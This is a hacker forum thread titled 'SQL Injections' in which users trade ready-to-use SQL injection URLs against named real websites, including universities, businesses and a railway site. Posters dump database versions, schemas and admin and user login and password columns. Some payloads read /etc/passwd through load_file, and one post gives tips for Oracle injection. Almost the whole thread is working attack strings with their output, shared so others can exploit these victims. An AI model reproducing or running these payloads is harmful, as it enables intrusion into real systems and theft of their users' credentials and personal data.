SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Bramin

    http://www.belaruslift.com/news.php?id=-23+union+select+1,group_concat(0x3a,login,password),3,4+from+admins--

    http://www.trkvolgamoll.ru/news.php?id=-23+union+select+1,2,group_concat(table_name),4+from+information_schema.tables--

    http://www.e-portal.com.ua/news.php?id=-23+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--
     
    #11221 Bramin, 28 Nov 2009
    Last edited: 28 Nov 2009
    1 person likes this.
  2. 547

    Code:
    http://www.garylefevre.com/portfolio/portfolio.php?id=9+union+select+1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3,4,5,6,7,8,9
    user:[email protected]
    version:5.0.81-log
    database:db238807836
    OS:pc-linux-gnu
     
    1 person likes this.
  3. Pr0mo

    -1-
    target : hana-g.com
    Exploit: http://hana-g.com/pay.php?id=2&order=1+AND+1=2+UNION+SELECT+0,null,2,3,4--
    Database : d031f18ydb1
    User : d031f18y@localhost
    Version : 5.1.36-community-log
    Contain :

    [0]area: area_id,area_name,order,enabled,upd_date,ins_date
    [1]card_data: cdat_id,ctyp_id,prg_id,cnt_id,id,password,price,point,flag,insert_time,use_time,card_number,etc,env
    [2]card_price: prg_id,ctyp_id,price,enabled
    [3]card_type: ctyp_id,ctyp_name,sname,chr,chr2,order,enabled,upd_date,ins_date
    [4]ccheck_sid: sid,prg_id,cnt_id,price,card_number,time
    [5]center: cnt_id,prg_id,cnt_name,alph_name,area_id,order,enabled,tel,bank1,bank2,bank3,bank4,credit_val_zero,credit_val_mobile,upd_date,ins_date,abt_cnt_id
    [6]prefecture: id,name
    [7]pricashop: htencd,htenko,prefecture,city,shopname,tel,town,address,route,opens,closes,holiday,hanaf,hitof,manif,purf,adry
    [8]pricashop_old: htencd,htenko,prefecture,city,shopname,tel,town,address,route,opens,closes,holiday,hanaf,hitof,manif,purf,adry
    [9]program: prg_id,prg_name,sname,sname2,order,man_info,woman_info,woman_minfo,enabled,upd_date,ins_date,abt_prg_id
    [10]rog: rogid,rognm,rog1,rog2,insdt,upddt
    [11]settings: key,value
    Example:
    http://hana-g.com/pay.php?id=2&order=1+AND+1=2+UNION+SELECT+0,concat(cdat,0x3a,ctyp_id,0x3a,id,0x3a,password),2,3,4+from+card_data--


    -2-
    target : www.goldpoint.com.ar
    Exploit: http://www.goldpoint.com.ar/producto.php?id=67/**/and/**/1=2/**/union/**/select/**/1,2,3,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
    Database : ingelec_mailing
    User : ingelec@localhost
    Version : 5.0.85-community
    Contain :

    [0]news_emails: email_id,email_title,email_subject,email_body,email_identity
    [1]news_files: file_id,file_newsletter,file_file
    [2]news_groups: group_id,group_code,group_title,group_identity,group_date,group_description,group_system,group_public
    [3]news_history: history_id,history_newsletter,history_user,history_name,history_email,history_status,history_date,history_group
    [4]news_identities: person_id,person_name,person_email,person_signature,person_signature_html,person_phone,person_protect
    [5]news_newsletters: newsletter_id,newsletter_code,newsletter_problem,newsletter_group,newsletter_title,newsletter_date,newsletter_body_txt,newsletter_body_html,newsletter_sent,newsletter_overwrite,newsletter_signature,newsletter_from,newsletter_from_name,newsletter_misc_history,newsletter_misc_identity2,newsletter_misc_signature
    [6]news_users: user_id,user_status,user_confirm,user_group,user_date,user_name,user_email,user_type,user_company,user_address,user_city,user_state,user_zip,user_country,user_phone,user_fax,user_site,user_im_yahoo,user_im_msn,user_im_icq,user_im_aol,last_name,referrer,level
    [7]news_vars: name,value
    [8]site_mb_msg: msg_id,msg_type,msg_user,msg_date,msg_title,msg_from,msg_to,msg_body,msg_new,msg_delete
    [9]site_user_notes: note_id,note_title,note_body,note_relation,note_type,note_post_date,note_post_ip,note_post_user
    [10]site_users: user_id,user_login,user_password,user_name,user_address,user_city,user_state,user_zip,user_country,user_phone,user_email,user_email2,user_im_aol,user_im_icq,user_im_msn,user_im_yahoo,user_im_other,user_status,user_level,user_pending,user_date,last_login,last_ip,user_msg_send,user_msg_subject,user_protect_delete,user_protect_edit,user_group,user_role
    [11]site_vars: id,name,value
    Example:
    http://www.goldpoint.com.ar/producto.php?id=67/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(user_login,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+ingelec_mailing.site_users--



    -3-
    target : www.vivliokritiki.gr
    Exploit: www.vivliokritiki.gr/title.php?id=6+AND+1=2+UNION+SELECT+0,null,2,3,4,5,6,7,8,9,10,11--
    Database : vivlio
    User : [email protected]
    Version : 5.0.83-log
    Contain :

    [0]administrator: name,password
    [1]author: id,fname,lname
    [2]authorTitle: id,tid,aid
    [3]category: id,name
    [4]comments: id,tid,name,email,postdate,comments
    [5]guestBook: id,name,email,postdate,comments
    [6]publisher: id,house,address
    [7]publisherTitle: id,pid,tid,pdate,price,pages
    [8]title: id,cid,name,review,subtitle,reviewer
    [9]users: id,fname,lname,email,password,comments
    [10]verification: id,value
    Example:
    http://www.vivliokritiki.gr/title.php?id=6+AND+1=2+UNION+SELECT+0,concat(name,0x3a,password),2,3,4,5,6,7,8,9,10,11+from+administrator--



    -4-
    target : www.hemasolutions.com
    Exploit: http://www.hemasolutions.com/query.php?id=13+AND+1=2+UNION+SELECT+0,null,2,3,4,5,6,7,8,9--
    Databases :
    • hemasol_acc
    • hemasol_balkan
    • hemasol_balkanforum
    • hemasol_calculators
    • hemasol_hema
    • hemasol_leather
    • hemasol_mall
    • hemasol_vioenergy
    • hemasol_viva
    • hemasol_widget
    User : hemasol@localhost
    Version : 5.0.81-community-log
    Contain (hemasol_hema) :

    [0]downloaded: downloaded_id,downloaded_date,downloaded_file,downloaded_ip
    [1]downloads: downloads_id,downloads_name,downloads_lang,downloads_version,downloads_date,downloads_av,downloads_src,downloads_file,downloads_ext
    [2]faqs: faqs_id,faqs_date,faqs_question,faqs_answer
    [3]news: news_id,news_date,news_head,news_body,news_image,news_image_ext,news_lang
    [4]plans: plans_id,plans_owner,plans_template,plans_src,plans_date,plans_disp_style
    [5]pools: pools_id,pools_date,pools_ip,pools_q1,pools_a1,pools_q2,pools_a2,pools_q3,pools_a3
    [6]queries: queries_id,queries_owner,queries_date,queries_template,queries_args,queries_result
    [7]questions: questions_id,questions_name,questions_email,questions_date,questions_topic,questions_text
    [8]requests: requests_id,requests_date,requests_name1,requests_name2,requests_title,requests_email,requests_company,requests_address,requests_city,requests_state,requests_post,requests_country,requests_page,requests_info
    [9]reviews: reviews_id,reviews_date,reviews_head,reviews_body,reviews_lang,reviews_author,reviews_email,reviews_rating,reviews_approved,reviews_company
    [10]templates: templates_id,templates_name,templates_lang,templates_group,templates_owner,templates_email,templates_xml,templates_creation,templates_used,templates_active
    [11]users: users_id,users_name,users_pass,users_desc,users_country,users_city,users_address,users_tel,users_email,users_website,users_ip,users_lang,users_plans_left,users_download_allowed,users_created,users_active,users_agree
    [12]webmasters: webmasters_id,webmasters_name,webmasters_site,webmasters_ip,webmasters_css,webmasters_lang,webmasters_templates,webmasters_plans_left,webmasters_created
    [13]webplans: webplans_id,webplans_owner,webplans_user,webplans_template,webplans_short,webplans_src,webplans_date
    Example:
    http://www.hemasolutions.com/query.php?id=13+AND+1=2+UNION+SELECT+0,concat(users_name,0x3a,users_pass),2,3,4,5,6,7,8,9+from+hemasol_hema.users--
     
    #11223 Pr0mo, 28 Nov 2009
    Last edited: 29 Nov 2009
    2 people like this.
  4. Strilo4ka

    TIC: 50
    PR: 4

    u_billiard@localhost@[email protected]@pc-linux-gnu

    erotic massage :)
    .0.22:nefer_vladimir:nefer_vladimir@localhost:unknown-freebsd6.0

    MENU@category@config@config_cat@item@main

    attributes

    menu:
    idmenu@item@mat_id@root_id@por@item_ukr@item_eng@type

    category:
    cat_id@root_cat@name_cat@descr@sh_descr@img@por

    config:
    name_site@description@adminlogin@adminpass@id@meta

    config_cat:
    item_per_page@i_shop@email@add_img@money@id

    item:
    id@id_category@title@description@sh_description@price@hits@money_type@print_to_index@img@ad_img

    main:
    d@name@info@info_ukr@info_eng
     
    #11224 Strilo4ka, 28 Nov 2009
    Last edited: 29 Nov 2009
    1 person likes this.
  5. Gorev

    http://www.bizarresoft.ro/produse_detalii.php?produs=-15+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14

    Database Version: 5.0.85-community-log
    Database name: bizarres_bizarres
    User name: bizarres_barabum@localhost
    Os : pc-linux-gnu
     
    1 person likes this.
  6. Bb0y

    http://www.stimul-n.bg/site/advert.php?id=-4+union+select+1,2,group_concat(0x0b,column_name)+from+information_schema.columns+where+table_name=0x7573657273
    users::id:user,pass:email:perm
    http://www.stimul-n.bg/site/advert.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,user,0x3a,pass,0x3a,email,0x3a,perm)+from+users
    MySQL MySQL 5.0.32-Debian_7etch1-log
    ==========================================================
    http://ovbot.com/go.php?id=-4+union+select+group_concat(0x0b,column_name)+from+information_schema.columns+where+table_name=0x77705f7573657273
    wp_users:: ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name
    http://ovbot.com/go.php?id=-4+union+select+group_concat(0x0b,ID,0x3a, user_login,0x3a, user_pass,0x3a,user_email)+from+wp_users
    MySQL 5.0.81-community
     
    1 person likes this.
  7. Strilo4ka

    ZAXID.NET
    user:chatzaxid@localhost
    DB:chatzaxid
    version:5.1.37-log
    OS:unknown-linux-gnu

    our tables:
    Code:
    banerz,banerz_groups,banerz_specials,banners,confdisclaimers,conferences,confusers,qa,urights
    attributes of confusers:
    Code:
    uid,unick,upib,uemail,uicq,uworkplace,uposada,upass,banned
    users:

    1595 users in total!!!
     
    #11227 Strilo4ka, 30 Nov 2009
    Last edited: 30 Nov 2009
    1 person likes this.
  8. edge911

    ------
     
    4 people like this.
  9. Strilo4ka

    Official site of the Southern Railway!
    output is in the <title> tag

    In this case the SQL injection is in Oracle!

    table AAABBB

    Oracle
    user PZ

    PZTAB

    users
    Code:
    OUTLN
    SYS
    DBSNMP
    ...
    
    tables of the system user SYS
    Code:
    Dual
    AUDIT_ACTIONS
    
    access to DBA_USERS is denied for the user the script runs as.

    Code:
    rownum instead of limit
    quotes are escaped
    the query in the script has one attribute
    concatenation like this: attribute||chr(ASCII character)||..||..||..
    
     
    #11229 Strilo4ka, 30 Nov 2009
    Last edited: 30 Nov 2009
    2 people like this.
  10. Bramin

    http://aquatoriya.org/news.php?id=-5+union+select+1,2,group_concat(table_name),4,5,6+from+information_schema.tables--

    http://www.photobooth.net/art/index.php?artistID=-21+union+select+1,2,3,4,5,6,7,load_file(0x2F6574632F706173737764),9--
     
    #11230 Bramin, 1 Dec 2009
    Last edited: 2 Dec 2009
  11. KNR

    http://www.cfess.org.br/noticias_res.php?id=-22+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12/*
     
    #11231 KNR, 1 Dec 2009
    Last edited: 1 Dec 2009
    1 person likes this.
  12. Strilo4ka

    5.0.87-log:catalogarenabel:catalogarenabel@localhost:portbld-freebsd7.2
    Code:
    partnerstehno_backs@partnerstehno_banners@partnerstehno_chapters@partnerstehno_counts@partnerstehno_cp_clons@partnerstehno_cp_links@partnerstehno_cp_linkstoclons@partnerstehno_letters@partnerstehno_links@partnerstehno_linkstocp@partnerstehno_scheduler@partnerstehno_templates@tehno_backs@tehno_banners@tehno_chapters@tehno_counts@tehno_cp_clons@tehno_cp_links@tehno_cp_linkstoclons@tehno_letters@tehno_links@tehno_linkstocp@tehno_scheduler@tehno_templates
    5.0.77:alphaav_bp:alphaav_dhsilabs@localhost:portbld-freebsd6.4
    tables:
    Code:
    category@prop
    prop columns:
    Code:
    no@dt@id@org@name@phone@email@typ@txt@conf
    category columns:
    Code:
    id@cat@des

    5.0.77:ccs-dc_org:[email protected]:redhat-linux-gnu

    tables
    content@session@user@version_link

    attributes of user

    user_id@email@name@password@password_change@password_forgot_key@password_forgot_key_expire
     
    #11232 Strilo4ka, 2 Dec 2009
    Last edited: 2 Dec 2009
    1 person likes this.
  13. Fooog

    http://www.geotunis.org/index_en.php?id=-5++union+select+1,2,3,4,5,6,7,8--

    http://www.alfajer.com/company_details.php?ID=-7+union+select+1,2,3,4,5,6,7,8,9,10--
     
    #11233 Fooog, 2 Dec 2009
    Last edited: 3 Dec 2009
    2 people like this.
  14. .Varius

    http://www.huesler-nest.ch/en/news.php?id=-10+union+select+1,2,3,4,5,6,7,8,9--
    5.0.32-Debian
    huesler@localhost

    http://www.esoterica.ru/news.php?id=-22+union+select+1,2,3,4,5--
    TIC 170.
     
    #11234 .Varius, 3 Dec 2009
    Last edited: 29 Jun 2010
    3 people like this.
  15. edge911

    http://tdes.nnov.ru/thumbnails.php?id=-980+union+select+1,2,3,4,5,6,7,8,9,0,1,2,table_name,4,5+from+information_schema.tables+limit+19,1%20--&page=0
     
  16. DezMond™

    Code:
    http://www.sanfordwomenshealth.org/staff/index.php?id=&entryid=-3+union+select+1,2,3,4,5,6,7,table_name,9,10+from+information_schema.tables+/*+
    Code:
    http://www.trailking.com/news/index.php?newsid=-2+union+select+1,2,3,4,5,6,7,8,9+--+
    Code:
    http://www.ve4erina.ru/services/index.php?n=-3+union+select+1,user()+--+&id=27
    Code:
    http://www.computertoday.net/magazine.php?mag=WinMag&mag_no=-166+union+select+1,2,3,4,5,unhex(hex(concat_ws(0x3a3a,username,password,email))),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+phpuserlogin_users+/*+&backyear=2007'

    Code:
    http://www.hydrix.com/services/index.php?id=27+union+select+1,2,3,4,5,6,7,8,9+--+
     
    3 people like this.
  17. nemaniak

    barrettos.info

    Code:
    http://www.barrettos.info/index.php?option=com_joaktree&view=joaktree&treeId=-1+union+select+1,1,1,1,1,1,1,concat_ws(0x3a,id,usertype,username,password),1,1,1,1,1,1,1,1+from+jos_users+--
    Code:
    5.1.30:barrett2_jo151@localhost:barrett2_jo151
    hilsonmoormanfamily.com

    Code:
    http://www.hilsonmoormanfamily.com/login/index.php?option=com_joaktree&view=joaktree&treeId=-1+union+select+1,1,1,version%28%29,1,1,1,concat%28username,0x3a,password%29,1,1,1,1,1,1,1,1+from+jos_users--
    Code:
    5.0.81-community:hilsonm1_jo151@localhost:hilsonm1_jo151
     
    #11237 nemaniak, 4 Dec 2009
    Last edited: 5 Dec 2009
    1 person likes this.
  18. gromoza

    ----------------------------
     
    1 person likes this.
  19. Bramin

    http://www.elps.hs.iastate.edu/news.php?id=-12+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables--
    looking at the columns in the wp_users table
    http://www.elps.hs.iastate.edu/news.php?id=-12+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from +information_schema.columns+where+table_name=0x77705F7573657273--

    more food:

    http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file(0x2F6574632F706173737764),3,4,5--

    http://mtucrt.students.mtu.edu/index.php?id=-12+union+select+1,concat_ws(user(),database()%20,version(),@@version_compile_os),3,4,5,6,7--
     
    #11239 Bramin, 5 Dec 2009
    Last edited: 5 Dec 2009
    2 people like this.
  20. 547

    nice little site)

    Code:
    http://www.modifiedstreetcars.com/girls.php?Hot%20Girl%20on%20Peugeot%20Bonnet&id=-100+union+select+1,2,3,unhex%28hex%28group_concat%280x3a,member_id,0x3a,username,0x3a,password,0x3a,email%29%29%29,5,6,7,8,9+from+members--
     
    1 person likes this.